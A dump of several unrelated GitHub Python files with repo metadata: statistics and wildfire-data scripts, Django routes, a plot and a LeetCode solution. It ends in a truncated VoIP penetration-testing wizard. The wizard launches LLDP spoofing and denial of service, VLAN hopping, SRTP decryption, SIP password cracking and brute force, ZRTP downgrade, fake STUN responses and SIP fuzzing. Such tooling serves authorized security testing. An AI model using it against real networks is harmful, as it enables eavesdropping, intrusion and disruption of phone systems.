\\hat{\\sigma_s^2}\nLL = -10.0 # on initialise la log-vraisemblance\nliste = np.arange(-10, 10, 0.01) #on prend un pas de 0.01 pour sigma_s^2\n#un pas de 1 suffit pour sigma^2\nfor x in range(-10,10):\n for y in liste:\n if LL < f([x,y]) : \n sigma_chap = x\n sigma_s_chap = y\n LL = f([x,y])\n \nprint(\"Le maximum de la log vraisemblance est\",LL)\nprint(\"sigma^2 vaut\",sigma_chap, \"et sigma_s^2 vaut\",sigma_s_chap)\n\n# On trouve les bonnes valeurs de sigma \n","repo_name":"MegDie/ML_VS_REML","sub_path":"Illustrations.py","file_name":"Illustrations.py","file_ext":"py","file_size_in_byte":3926,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"40788918159","text":"import module_cube as hz\nimport numpy as np\nimport rasterio\nimport matplotlib.pyplot as plt\nimport xarray as xr\nimport rioxarray as rxr\nimport geopandas as gpd\nfrom shapely.geometry import mapping\n\nif __name__ == \"__main__\":\n\n ''' ----------------------------------------------------------------------------------------------------------------\n----------------------------------------1. Load raw dataset ---------------------------------------------------------'''\n\n # Create a path to the data directory\n path_data = \"../../data/final/\"\n\n # Load the data set\n ndvi = xr.open_dataset(path_data + 'final_ndvi_16D_1km.nc')\n lai = xr.open_dataset(path_data + 'final_lai_8D_500m.nc')\n evap = xr.open_dataset(path_data + 'final_evap_8D_500m.nc')\n era = xr.open_dataset(path_data + 'Raw_weather_4H_9km.nc')\n lst_night = xr.open_dataset(path_data + 'final_lst_night_1D_1km.nc')\n lst_day = xr.open_dataset(path_data + 'final_lst_day_1D_1km.nc')\n active_fire = xr.open_dataset(path_data + 'final_active_fire_1M_500m.nc')\n burn_mask = xr.open_dataset(path_data + 'final_fire_mask_1M_1km.nc')\n fwi = xr.open_mfdataset(path_data + '/Raw_Fwi/*.nc', combine='by_coords', chunks=None)\n density = rxr.open_rasterio(path_data + 'fra_pd_2015_1km_UNadj.tif', masked=True).squeeze()\n\n ''' ----------------------------------------------------------------------------------------------------------------\n-------------------------------------2. Select variables of interest ------------------------------------------------'''\n # Select the variables of interest\n ndvi_filter = ndvi['_1_km_16_days_EVI']\n lai_filter = lai['Fpar_500m']\n evap_filter = evap['ET_500m']\n era_filter = era[['u10', 'v10', 't2m', 'tp']]\n lst_night_filter = lst_night['LST_Night_1km']\n lst_day_filter = lst_day['LST_Day_1km']\n active_fire_filter = active_fire[['First_Day', 'Last_Day', 'Burn_Date']]\n burn_mask_filter = burn_mask['FireMask']\n\n ''' ----------------------------------------------------------------------------------------------------------------\n----------------------------------------3. Select duration -------------------------------------------------------\n\n 1) Harmonize the datacube to the same calendar: Julian calendar\n 2) Select the period of interest: 2010-2021\n \n 1) Harmonize the datacube to the same calendar: Julian calendar'''\n era_filter = era_filter.convert_calendar('julian')\n\n \"\"\" 2) Select the period of interest: 2010-2021\"\"\"\n ndvi_filter = ndvi_filter.sel(time=slice('2010-01-01', '2021-01-01'))\n lai_filter = lai_filter.sel(time=slice('2010-01-01', '2021-01-01'))\n evap_filter = evap_filter.sel(time=slice('2010-01-01', '2021-01-01'))\n era_filter = era_filter.sel(time=slice('2010-01-01', '2021-01-01'))\n lst_night_filter = lst_night_filter.sel(time=slice('2010-01-01', '2021-01-01'))\n lst_day_filter = lst_day_filter.sel(time=slice('2010-01-01', '2021-01-01'))\n active_fire_filter = active_fire_filter.sel(time=slice('2010-01-01', '2021-01-01'))\n burn_mask_filter = burn_mask_filter.sel(time=slice('2010-01-01', '2021-01-01'))\n\n ''' ----------------------------------------------------------------------------------------------------------------\n-------------------------------------4. Fill the missing values ------------------------------------------------\n\n 1) Quadratic interpolation for the land surface temperature because of high number of missing values (more than 50%)\n 2) Linear interpolation for variables from era5 which have around 20% of missing values\n 3) Forwardfill for the other variables which have less than 10% of missing values and are categorical variables'''\n\n ''' 1) Quadratic interpolation '''\n lst_day_filter = lst_day_filter.interpolate_na(dim='time', method='quadratic').ffill(dim='xdim').ffill(dim='ydim')\n lst_night_filter = lst_night_filter.interpolate_na(dim='time', method='quadratic').ffill(dim='xdim').ffill(\n dim='ydim')\n\n ''' 2) Linear interpolation '''\n era_filter = era_filter.interpolate_na(dim='time', method='linear').ffill(dim='xdim').ffill(dim='ydim')\n\n ''' 3) Forwardfill '''\n ndvi_filter = ndvi_filter.ffill(dim='time').ffill(dim='xdim').ffill(dim='ydim')\n lai_filter = lai_filter.ffill(dim='xdim').ffill(dim='ydim').ffill(dim='time')\n evap_filter = evap_filter.ffill(dim='xdim').ffill(dim='ydim').ffill(dim='time')\n active_fire_filter = active_fire_filter.ffill(dim='xdim').ffill(dim='ydim').ffill(dim='time')\n burn_mask_filter = burn_mask_filter.ffill(dim='xdim').ffill(dim='ydim').ffill(dim='time')\n density = density.ffill(dim='x', limit=None).ffill(dim='y', limit=None)\n\n ''' ----------------------------------------------------------------------------------------------------------------\n-------------------------------------5. Writing CRS ---------------------------------------------------------------\n\n 1) Create a CRS object from a poj4 string for sinuoidal projection\n 2) Set the CRS of the data sets with hz.define_crs()'''\n\n ''' 1) Create a CRS object from a poj4 string for sinuoidal projection'''\n crs_sinu = rasterio.crs.CRS.from_string(\n \"+proj=sinu +lon_0=0 +x_0=0 +y_0=0 +a=6371007.181 +b=6371007.181 +units=m +no_defs\")\n\n ''' 2) Set the CRS of the data sets with hz.define_crs()'''\n ndvi_filter = hz.define_crs(ndvi_filter, crs_sinu)\n lai_filter = hz.define_crs(lai_filter, crs_sinu)\n evap_filter = hz.define_crs(evap_filter, crs_sinu)\n era_filter = hz.define_crs(era_filter, 4326)\n lst_night_filter = hz.define_crs(lst_night_filter, crs_sinu)\n lst_day_filter = hz.define_crs(lst_day_filter, crs_sinu)\n active_fire_filter = hz.define_crs(active_fire_filter, crs_sinu)\n burn_mask_filter = hz.define_crs(burn_mask_filter, crs_sinu)\n density = hz.define_crs(density, 4326)\n\n ''' ----------------------------------------------------------------------------------------------------------------\n-------------------------------------6. Clipping to the AOI ------------------------------------------------\n\n 1) Define the AOI\n 2) Clip the data sets to the AOI'''\n\n ''' 1) Define the AOI'''\n aoi = hz.define_area_of_interest(path_data + 'Large.zip')\n\n ''' 2) Clip the data sets to the AOI'''\n era_filter = hz.clip_to_aoi(era_filter, aoi)\n density = hz.clip_to_aoi(density, aoi)\n\n ''' ----------------------------------------------------------------------------------------------------------------\n-------------------------------------7. Projection ------------------------------------------------\n\n 1) Define a common grid to project the data sets\n 2) Projection of the Era5 data set\n 2.1 Downsample era5 first to daily data decrease the computational time\n 2.2 Project the downsampled data set to the same crs as the common grid\n 2.3 Rename the dimensions in order to project the data set to the common grid\n 2.4 Project to the common grid\n 3) Projection of the density dataaray\n 3.1 Create a name for the data array\n 3.2 Change the array into a data set\n 3.3 Project the data set to the common grid \n 4) Projection of the other data sets'''\n\n ''' 1) Define a common grid to project the data sets'''\n common_grid = rxr.open_rasterio(path_data + 'final_lst_day_1D_1km.nc').isel(time=0)\n\n ''' 2) Projection of the Era5 data set'''\n ''' 2.1 Downsample era5 first to daily data decrease the computational time'''\n era_filter_daily = hz.resample_to_daily(era_filter)\n\n ''' 2.2 Project the downsampled data set to the same crs as the common grid'''\n era_sinu = era_filter_daily.rio.reproject(crs_sinu)\n\n ''' 2.3 Rename the dimensions in order to project the data set to the common grid'''\n era_filter_proj = era_sinu.rename({'y': 'ydim', 'x': 'xdim'})\n\n ''' 2.4 Project to the common grid'''\n era_filter_proj = hz.interpolate_to_common_grid(era_sinu, common_grid)\n\n ''' 3) Projection of the density dataaray \n 3.1 Create a name for the data array'''\n density.name = 'density'\n\n ''' 3.2 Change the array into a data set'''\n density = density.to_dataset()\n\n ''' 3.3 Project the data set to the common grid '''\n density_proj = hz.interpolate_to_common_grid(density, common_grid)\n\n ''' 4) Projection of the other data sets'''\n lai_filter_proj = hz.interpolate_to_common_grid(lai_filter, common_grid)\n\n evap_filter_proj = hz.interpolate_to_common_grid_categorical(evap_filter, common_grid)\n\n # Different method to interpolate the active fire data set because of the different data type\n active_fire_filter_proj = active_fire_filter.interp(ydim=ndvi[\"ydim\"], xdim=ndvi['xdim'])\n\n ''' ----------------------------------------------------------------------------------------------------------------\n-----------------------------------------8. Resampling to daily -----------------------------------------------------'''\n # Resample to daily\n ndvi_filter_daily = hz.resample_to_daily(ndvi_filter)\n burn_mask_filter_daily = hz.resample_to_daily_categorical(burn_mask_filter)\n lai_filter_proj_daily = hz.resample_to_daily(lai_filter_proj)\n evap_filter_proj_daily = hz.resample_to_daily_categorical(evap_filter_proj)\n active_fire_filter_proj_daily = hz.resample_to_daily(active_fire_filter_proj)\n\n ''' ----------------------------------------------------------------------------------------------------------------\n------------------------------- 9 Prepare the datasets for merging --------------------------------------------\n\n Prepare the datasets for merging:\n 1) Delete the attribute grid_mapping: unecessary and conflictual\n 2) Create the two list from the name of the coordinates \n 3) Match the coordinates values of the data sets to match the other data sets\n 4) Rename the coordinates of the data sets to match the other data sets\n 5) Merge the data sets'''\n\n '''1) Delete the attribute grid_mapping: unnecessary and conflictual'''\n # Deleting attribute grid_mapping of the burn_mask_filter data set\n del burn_mask_filter.attrs['grid_mapping']\n # Deleting attribute grid_mapping of the evap_filter_proj data set\n del evap_filter_proj.attrs['grid_mapping']\n # Deleting attribute grid_mapping of the lst_night_filter data set\n del lst_night_filter.attrs['grid_mapping']\n # Deleting attribute grid_mapping of the lst_day_filter data set\n del lst_day_filter.attrs['grid_mapping']\n # Deleting attribute grid_mapping of the ndvi_filter data set\n del ndvi_filter.attrs['grid_mapping']\n # Deleting attribute grid_mapping of the lai_filter data set\n del lai_filter.attrs['grid_mapping']\n\n ''' 2) Create the two list from the name of the coordinates'''\n # Create a list of the data sets\n data_sets = [ndvi_filter_daily, burn_mask_filter_daily, lai_filter_proj_daily, evap_filter_proj_daily,\n era_filter_proj, active_fire_filter_proj_daily]\n\n # Create a first list with coordinate x and y\n list_xy = [lai_filter_proj_daily,\n evap_filter_proj_daily,\n era_filter_proj,\n density_proj]\n\n # Create a second list with coordinate xdim and ydim\n list_xdimydim = [ndvi_filter_daily,\n burn_mask_filter_daily,\n active_fire_filter_proj_daily,\n lst_night_filter,\n lst_day_filter]\n\n # Merge and save by coordinates the data sets from the lists\n ds_xy = xr.combine_by_coords(list_xy, combine_attrs='drop_conflicts')\n ds_xdimydim = xr.combine_by_coords(list_xdimydim, combine_attrs='drop_conflicts')\n\n ''' 3) Match the coordinates of the data sets to match the other data sets'''\n ds_xdimydim_xdimydim = ds_xdimydim.assign_coords(xdim=ds_xy.coords['x'].values, ydim=ds_xy.coords['y'].values)\n\n ''' 4) Rename the coordinates to match the other data sets'''\n ds_xdimydim_xdimydim = ds_xdimydim_xdimydim.rename({'xdim': 'x', 'ydim': 'y'})\n\n ''' 5) Merge the data sets'''\n ds = xr.merge([ds_xy, ds_xdimydim_xdimydim])\n\n ''' ----------------------------------------------------------------------------------------------- \n---------------------------------10 Poject to GPS coordinates-------------------------------------------------'''\n\n ''' We have a datacube with the following dimensions: time, y, x. We want now:\n to project it into GPS coordinates.'''\n\n ''' Projection of the data cube into GPS coordinates'''\n # Projection of ds into WGS84\n ds_gps = ds.rio.reproject(\"EPSG:4326\", grid_mapping_name='latitude_longitude')\n\n ''' ----------------------------------------------------------------------------------------------------------------\n------------------------------- 11 Create aggregated variables --------------------------------------------\n\n 1) Create a list of the dynamic variables to aggregate\n 2) Split the datacube into 10 datacubes of 1 year for computation reasons \n 3) Apply the function to aggregate the variables: mean over 10 previous days\n 4) Concatenate the datacubes'''\n\n ''' 1) Create a list of the dynamic variables to aggregate'''\n dynamic_variables = ['ET_500m',\n 'Fpar_500m',\n 'u10',\n 'v10',\n 't2m',\n 'tp',\n 'LST_Day_1km',\n 'LST_Night_1km',\n '_1_km_16_days_EVI']\n\n ''' 2) Split the datacube into 10 datacubes of 1 year for computation reasons'''\n list_ds = hz.split_datacube(ds_gps, first_year=2010, last_year=2011)\n\n ''' 3) Apply the function to aggregate the variables: mean over 10 previous days'''\n for i in range(len(list_ds)):\n list_ds[i] = hz.aggregate_dataset(list_ds[i], period_size=10, dynamic_variables=dynamic_variables)\n print(f\"list_ds[{i}] ok\")\n\n ''' 4) Concatenate the datacubes'''\n aggregate_datacube = xr.concat(list_ds, dim=\"time\")\n\n ''' ---------------------------------------------------------------------------------------------------------------- \n----------------------------------------------12. Save the datacube--------------------------------------------------\n\n 1) Delete unnecessary attributes\n 2) Save the datacube'''\n\n ''' 1) Delete unnecessary attributes'''\n del aggregate_datacube['First_Day'].attrs['grid_mapping']\n del aggregate_datacube['Last_Day'].attrs['grid_mapping']\n del aggregate_datacube['Burn_Date'].attrs['grid_mapping']\n del aggregate_datacube['FireMask'].attrs['grid_mapping']\n\n ''' 2) Save the datacube'''\n aggregate_datacube.to_netcdf(path_data + 'aggregate_datacube.nc')\n","repo_name":"Sliders122/wildfire","sub_path":"src/cube/cube.py","file_name":"cube.py","file_ext":"py","file_size_in_byte":14726,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"67"} +{"seq_id":"38703229346","text":"from django.urls import path\nfrom . import views\napp_name='DevTools'\n\nurlpatterns = [\n path('', views.tool_list, name ='tool_list'),\n path('create/', views.tool_create, name ='tool_create'),\n path('/', views.tool_detail, name ='tool_detail'),\n path('/delete/',views.tool_delete, name='tool_delete'),\n path('/update/', views.tool_update, name='tool_update'),\n]","repo_name":"SeungJooKim/KimSeungju","sub_path":"SWIDEA_SITE/config/DevTools/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"1108472611","text":"import argparse\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nparser = argparse.ArgumentParser()\nparser.add_argument('-i', '--infile', type=str, action='store', dest='infile',\thelp='Folder containing original couplings')\nparser.add_argument('-o', '--outfile', type=str, action='store', dest='outfile', help='Flag for output files')\nparser.add_argument('-s', '--slice_length',type=int, action='store', dest='slice_length',default=0, help='length of slice from sequence used in training')\nargs = parser.parse_args()\n\ndef freq(h,J,L):\n\tf_start = np.exp( - h)\n\tf1 = np.exp( - h - 0.5 * np.tensordot(J, f_start, axes=2))\n\tf2 = np.exp( - h.reshape(L,3,1,1) - h.reshape(1,1,L,3) - 0.5 * J \\\n\t\t- 0.5 * np.tensordot(J, f_start, axes=2).reshape(L,3,1,1) \\\n\t\t- 0.5 * np.tensordot(J, f_start, axes=2).reshape(1,1,L,3) )\n\treturn (f1,f2)\n\n\nJ_init = np.load(f'../test_data/output_{args.infile}/couplings_init.npy')\nh_init = np.load(f'../test_data/output_{args.infile}/fields_init.npy')\nL = h_init.shape[0]\nf_init_1, f_init_2 = freq(h_init,J_init,L)\n\n\nif args.slice_length == 0:\n\tJ_mf = np.load(f'../test_data/output_{args.infile}/{args.outfile}/couplings_mf.npy')\n\th_mf = np.load(f'../test_data/output_{args.infile}/{args.outfile}/fields_mf.npy')\n\tf_mf_1, f_mf_2 = freq(h_mf,J_mf,L)\n\n\tfig, (ax1,ax2) = plt.subplots(1,2)\n\n\tax1.scatter(f_init_1.flatten(),f_mf_1.flatten(),color='red',alpha=0.5)\n\tax1.legend()\n\tax1.set_xlabel(r'f$_{1s init}$')\n\tax1.set_ylabel(r'f$_{1s MF}$')\n\n\n\tax2.scatter(f_init_2.flatten(),f_mf_2.flatten(),color='red',alpha=0.5)\n\tax2.legend()\n\tax2.set_xlabel(r'f$_{2s init}$')\n\tax2.set_ylabel(r'f$_{2s MF}$')\n\n\tplt.suptitle('Actual vs. inferred values for mean-field inference of a Gaussian matrix padded with zeros')\n\tplt.show()\nelse:\n\tJ_mf_slice = np.load(f'../test_data/output_{args.infile}/{args.outfile}/couplings_mf_slice_{args.slice_length}.npy')\n\th_mf_slice = np.load(f'../test_data/output_{args.infile}/{args.outfile}/fields_mf_slice_{args.slice_length}.npy')\n\n\tL = J_init.shape[0]\n\tgap = (L - args.slice_length) //2\n\tJ_mf = np.zeros((L,3,L,3))\n\tJ_mf[gap:(L-gap),:,gap:(L-gap),:] = J_mf_slice\n\th_mf = np.zeros((L,3))\n\th_mf[gap:(L-gap),:] = h_mf_slice\n\n\tf_mf_1, f_mf_2 = freq(h_mf,J_mf,L)\n\n\tfig, (ax1,ax2) = plt.subplots(1,2)\n\n\tax1.scatter(f_init_1.flatten(),f_mf_1.flatten(),color='red',alpha=0.5)\n\tax1.legend()\n\tax1.set_xlabel(r'f$_{1s init}$')\n\tax1.set_ylabel(r'f$_{1s MF}$')\n\n\n\tax2.scatter(f_init_2.flatten(),f_mf_2.flatten(),color='red',alpha=0.5)\n\tax2.legend()\n\tax2.set_xlabel(r'f$_{2s init}$')\n\tax2.set_ylabel(r'f$_{2s MF}$')\n\n\n\tplt.suptitle('Actual vs. inferred values for mean-field inference of a Gaussian matrix padded with zeros')\n\tplt.show()","repo_name":"andrewcboardman/aptamers","sub_path":"plotting/plot_ising_freqs.py","file_name":"plot_ising_freqs.py","file_ext":"py","file_size_in_byte":2671,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"21815205047","text":"class Solution:\n def compareVersion(self, version1, version2):\n \"\"\"\n :type version1: str\n :type version2: str\n :rtype: int\n \"\"\"\n v1 = [int(i) for i in version1.split(\".\")]\n v2 = [int(i) for i in version2.split(\".\")]\n \n for i in range(max(len(v1),len(v2))):\n v1_ = v1[i] if i < len(v1) else 0\n v2_ = v2[i] if i < len(v2) else 0\n \n if v1_ > v2_:\n return 1\n elif v1_ < v2_:\n return -1\n return 0","repo_name":"sk-g/Leetcode","sub_path":"python/165. Compare Version Numbers.py","file_name":"165. Compare Version Numbers.py","file_ext":"py","file_size_in_byte":549,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"67"} +{"seq_id":"24742761500","text":"import os\nimport sys\nimport subprocess\nfrom cmd import Cmd\nfrom helper import logo\n\n\ndef run_tool(tool_folder, command):\n '''This function will spawn a safe subprocess'''\n cwd = os.getcwd()\n cmd = command.split()\n cmd[0] = ''.join((cwd, '/tools/', tool_folder, '/', cmd[0]))\n subprocess.run(cmd, shell=False, cwd=os.path.join(cwd, 'tools', tool_folder))\n\n\nclass Wizard(Cmd):\n prompt = '\\033[0;32mwizard > \\033[0m'\n intro = logo()\n\n\n def do_bridge(self, inp):\n '''The bridge tool is a full layer2 bridge with two defined interfaces'''\n tool_folder = \"FullBridge\"\n print(\"\\nThe bridge tool is a full layer2 bridge with two defined interfaces\\n\")\n bridge_first_interface = input(\"Enter the first interface: \")\n bridge_second_interface = input(\"Enter the second Interface: \")\n bridge_bridgemode = input(\"Enter the bridge mode : \")\n run_tool(\n tool_folder, f\"fullbridge.sh {bridge_first_interface} {bridge_second_interface} {bridge_bridgemode}\")\n\n\n def do_vlanenum(self, inp):\n '''The vlanenum tool is a VLAN enumeration which creates virtual interfaces if VLAN's were found'''\n tool_folder = \"VlanEnum\"\n print(\"The vlanenum tool is a VLAN enumeration which creates virtual interfaces if VLAN's were found\")\n print(\"\\033[1;34m[*]\\033[0m If you want to enumerate numerous VLAN ID's, you should better use the vlanenum.sh script with multiple tmux sessions and different start VLAN ID's\")\n print(\"\")\n vlanenum_interface = input(\"Enter the interface which will be used: \")\n vlanenum_start_vid = input(\"Enter the start VLAN ID [1]: \") or \"1\"\n vlanenum_last_vid = input(\"Enter the last VLAN ID [4096]: \") or \"4096\"\n run_tool(\n tool_folder, f'vlanenum.sh {vlanenum_interface} {vlanenum_start_vid} {vlanenum_last_vid}')\n\n\n def do_timeshift(self, inp):\n '''The timeshift tool is a simple NTP Responder which sets the date to the past or to the future'''\n tool_folder = \"TimeShift\"\n print(\"The timeshift tool is a simple NTP Responder which sets the date to the past or to the future\")\n print(\"\\033[1;34m[*]\\033[0m You have to be in a man-in-the-middle position e.g. with the bridge tool or arp spoofing\")\n timeshift_src_ip = input(\"Enter the target IP address: \")\n timeshift_mode = input(\n \"Enter the mode [past]: \") or \"past\"\n run_tool(tool_folder,\n f'timeshift.py -s {timeshift_src_ip} -m {timeshift_mode}')\n\n\n def do_lldpspoof(self, inp):\n '''This tool is for spoofing LLDP-MED packets with different vendor specific attributes. It is useful to jump into VoIP VLAN if LLDP-MED is configured'''\n tool_folder = \"SaCLaC\"\n print(\"This tool is for spoofing LLDP-MED packets with different vendor specific attributes. It is useful to jump into VoIP VLAN if LLDP-MED is configured\")\n lldpspoof_interface = input(\"Enter the interface which will be used: \")\n lldpspoof_vendor = input(\"Enter the vendor [innovaphone]: \") or \"innovaphone\"\n\n if lldpspoof_vendor == \"innovaphone\":\n lldpspoof_mac = input(\"Enter the MAC address of an innovaphone device <00:90:33:XX:XX:XX> [00:90:33:00:00:01]: \") or \"00:90:33:00:00:01\"\n lldpspoof_device = input(\"Enter a device model e.g. [IP222]: \") or \"IP222\"\n lldpspoof_verbose = input(\"Verbose mode (will capture the possible response and open it in wireshark)? or [n]: \") or \"n\"\n\n cmd = f\"lldpspoof.py -V {lldpspoof_vendor} -m {lldpspoof_mac} -D {lldpspoof_device} -i {lldpspoof_interface}\"\n if lldpspoof_verbose == \"y\":\n cmd += \" -v\"\n run_tool(tool_folder, cmd)\n elif lldpspoof_vendor == \"unify\":\n lldpspoof_mac = input(\"Enter the MAC address of an unify device <00:1a:e8:XX:XX:XX> [00:1a:e8:00:00:01]: \") or \"00:1a:e8:00:00:01\"\n lldpspoof_verbose = input(\"Verbose mode (will capture the possible response and open it in wireshark)? or [n]: \") or \"n\"\n cmd = f\"lldpspoof.py -V {lldpspoof_vendor} -m {lldpspoof_mac} -i {lldpspoof_interface}\"\n if lldpspoof_verbose == \"y\":\n cmd += \" -v\"\n run_tool(tool_folder, cmd)\n else:\n print(\"Please set a valid vendor\")\n\n\n def do_lldpdos(self, inp):\n '''This tool is for spoofing LLDP-MED packets with tagged or untagged VLAN ID which will be set by the device'''\n tool_folder = \"SaCLaC\"\n print(\"This tool is for spoofing LLDP-MED packets with tagged or untagged VLAN ID which will be set by the device\")\n lldpdos_interface = input(\"Enter the interface which will be used: \")\n lldpdos_mode = input(\"Enter the mode [tag]: \") or \"tag\"\n lldpdos_mac = input(\"Enter the MAC address of the switch [78:d0:04:00:00:01]: \") or \"78:d0:04:00:00:01\"\n lldpdos_verbose = input(\"Verbose mode (will capture the possible response and open it in wireshark)? or [n]: \") or \"n\"\n cmd = f\"lldpspoof.py --dos -m {lldpdos_mac} -i {lldpdos_interface}\"\n if lldpdos_mode == \"tag\":\n if lldpdos_verbose == \"y\":\n cmd += \" -v\"\n run_tool(tool_folder, cmd)\n\n elif lldpdos_mode == \"untag\":\n if lldpdos_verbose == \"y\":\n cmd += \" --untag -v\"\n else:\n cmd += \" --untag\"\n run_tool(tool_folder, cmd)\n else:\n print(\"Please set a valid mode\")\n\n\n def do_decryptsrtp(self, inp):\n '''If you have the AES key from the SDP crypto attribute of the signaling part, you can decrypt the SRTP-SDES stream with this tool'''\n tool_folder = \"DecryptSRTP\"\n print(\"If you have the AES key from the SDP crypto attribute of the signaling part, you can decrypt the SRTP-SDES stream with this tool\")\n print(\"Sniff the RTP Stream and extract only the RTP part in a separate PCAP file\")\n decryptsrtp_keysize = input(\"Enter the keysize <128> or <256> [128]: \") or \"128\"\n decryptsrtp_key = input(\"Enter the AES key base64 encoded: \")\n decryptsrtp_infile = input(\"Enter the infile containing the extracted RTP stream: \")\n decryptsrtp_outfile = input(\"Enter the outfile (if nothing is set the file is stored under ./tools/DeccryptSRTP/): \")\n run_tool(tool_folder, f\"decryptsrtp.sh {decryptsrtp_keysize} {decryptsrtp_key} {decryptsrtp_infile} {decryptsrtp_outfile}\")\n\n\n def do_cdpanalyze(self, inp):\n '''A tool to analyze CDP packets in a PCAP file'''\n tool_folder = \"SaCLaC\"\n print(\"A tool to analyze CDP packets in a PCAP file\")\n cdpanalyze_file = input(\"Enter the the PCAP file to analyze: \")\n cdpanalyze_verbose = input(\"Verbose mode will display all packet information or [n]: \")\n cmd = f\"cdpanalyze.py -f {cdpanalyze_file}\"\n if cdpanalyze_verbose == \"y\":\n cmd += \" -v\"\n run_tool(tool_folder, cmd)\n\n\n def do_sipcrack(self, inp):\n '''A tool for brute forcing SIP digest authentication'''\n tool_folder=\"CrackTheSIP\"\n print(\"A tool for brute forcing SIP digest authentication\")\n sipcrack_username=input(\"Enter the username: \")\n sipcrack_uri=input(\"Enter the URI: \")\n sipcrack_nonce=input(\"Enter the nonce: \")\n sipcrack_realm=input(\"Enter the given realm: \")\n sipcrack_cnonce=input(\"Enter cnonce (if exists): \")\n sipcrack_noncecount=input(\"Enter the nonce count (if exists): \")\n sipcrack_qop=input(\"Enter the QOP [auth]: \") or \"auth\"\n sipcrack_response=input(\"Enter the SIP client' response: \")\n sipcrack_message=input(\"Enter the message type [REGISTER]: \") or \"REGISTER\"\n sipcrack_wordlist=input(\"Enter the wordlist for brute force: \")\n cmd=f\"sipcrack.py --username {sipcrack_username} --uri {sipcrack_uri} --nonce {sipcrack_nonce} --realm {sipcrack_realm} --response {sipcrack_response} --msg {sipcrack_message} --wordlist {sipcrack_wordlist}\"\n if sipcrack_cnonce:\n cmd += f\" --cnonce {sipcrack_cnonce} --noncecount {sipcrack_noncecount} --qop {sipcrack_qop}\"\n run_tool(tool_folder, cmd)\n\n\n def do_zrtpdowngrade(self, inp):\n '''A tool to downgrade the ZRTP media stream'''\n tool_folder = \"ZRTPDowngrade\"\n print(\"A tool to downgrade the ZRTP media stream\")\n zrtpdowngrade_interface=input(\"Enter the interface on which the tool will listen on [all]: \") or \"all\"\n cmd = f\"zrtpdowngrade.py\"\n if zrtpdowngrade_interface != \"all\":\n cmd += f\" -i {zrtpdowngrade_interface}\"\n run_tool(tool_folder, cmd)\n\n\n def do_evilstun(self, inp):\n '''A simple tool for fake STUN responses'''\n tool_folder=\"EvilSTUN\"\n print(\"A simple tool for fake STUN responses\")\n evilstun_stunip=input(\"Enter the listening ip address for STUN requests: \")\n evilstun_stunport=input(\"Enter the listening port for STUN requests [3478]: \") or \"3478\"\n evilstun_rtpip=input(\"Enter the fake ip address in the response: \")\n evilstun_rtpport=input(\"Enter the fake port in the response [16000]: \") or \"16000\"\n cmd=f\"evilstun.py --stunip {evilstun_stunip} --stunport {evilstun_stunport} --rtpip {evilstun_rtpip} --rtpport {evilstun_rtpport}\"\n run_tool(tool_folder, cmd)\n\n\n def do_sipfuzz(self, inp):\n '''A tool for SIP fuzzing'''\n tool_folder=\"SIPFuzz\"\n print(\"A tool for SIP fuzzing \")\n sipfuzz_dstip=input(\"Enter the destination SIP server: \")\n sipfuzz_dstport=input(\"Enter the destination SIP port [5060]: \") or \"5060\"\n sipfuzz_proto=input(\"Enter the protocol or [udp]: \") or \"udp\"\n sipfuzz_file=input(\"Enter the fuzz request file. Insert \\\"FUZZ\\\" at the point you want to fuzz: \")\n sipfuzz_startpoint=input(\"Enter the fuzzing start point [1]: \") or \"1\"\n sipfuzz_steps=input(\"Enter the fuzzing steps [1]: \") or \"1\"\n sipfuzz_size=input(\"Enter the fuzzing max. size [2000]: \") or \"2000\"\n sipfuzz_char=input(\"Enter the fuzzing char [A]: \") or \"A\"\n sipfuzz_time=input(\"Enter the delay between the fuzzing steps in seconds [0.5]: \") or \"0.5\"\n cmd=f\"sipfuzz.py --dst {sipfuzz_dstip} --dport {sipfuzz_dstport} --proto {sipfuzz_proto} --file {sipfuzz_file} --start-point {sipfuzz_startpoint} --steps {sipfuzz_steps} --size {sipfuzz_size} --char {sipfuzz_char} --time {sipfuzz_time}\"\n run_tool(tool_folder, cmd)\n\n\n def do_sipenum(self, inp):\n '''A tool for SIP extension enumeration'''\n tool_folder=\"SIPEnum\"\n print(\"A tool for SIP extension enumeration\")\n sipenum_dstip=input(\"Enter the destination SIP server: \")\n sipenum_dstport=input(\"Enter the destination SIP port [5060]: \") or \"5060\"\n sipenum_proto=input(\"Enter the protocol , or [udp]: \") or \"udp\"\n if sipenum_proto == \"tls\":\n sipenum_crt=input(\"Enter the certificate file [crt.crt]: \") or \"crt.crt\"\n sipenum_key=input(\"Enter the private key file [key.key]: \") or \"key.key\"\n sipenum_srcip=input(\"Enter the source ip address: \")\n sipenum_domain=input(\"Enter the SIP domain: \")\n sipenum_wordlist=input(\"Enter the wordlist with user extensions for enumeration [users/10-99.txt]: \") or \"users/10-99.txt\"\n if sipenum_proto == \"tls\": \n cmd=f\"sipenum.py --dst {sipenum_dstip} --dport {sipenum_dstport} --proto {sipenum_proto} --wordlist {sipenum_wordlist} --src {sipenum_srcip} --domain {sipenum_domain} --key {sipenum_key} --crt {sipenum_crt}\"\n else:\n cmd=f\"sipenum.py --dst {sipenum_dstip} --dport {sipenum_dstport} --proto {sipenum_proto} --wordlist {sipenum_wordlist} --src {sipenum_srcip} --domain {sipenum_domain}\"\n run_tool(tool_folder, cmd)\n\n\n def do_sipbrute(self, inp):\n '''A tool for SIP online brute force attacks'''\n tool_folder=\"SIPBrute\"\n print(\"A tool for SIP online brute force attacks\")\n sipbrute_dstip=input(\"Enter the destination SIP server: \")\n sipbrute_dstport=input(\"Enter the destination SIP port [5060]: \") or \"5060\"\n sipbrute_proto=input(\"Enter the protocol , or [udp]: \") or \"udp\"\n if sipbrute_proto == \"tls\":\n sipbrute_crt=input(\"Enter the certificate file [crt.crt]: \") or \"crt.crt\"\n sipbrute_key=input(\"Enter the private key file [key.key]: \") or \"key.key\"\n sipbrute_srcip=input(\"Enter the source ip address: \")\n sipbrute_domain=input(\"Enter the SIP domain: \")\n sipbrute_user=input(\"Enter the SIP username: \")\n sipbrute_wordlist=input(\"Enter the wordlist with passwords for the brute force attack 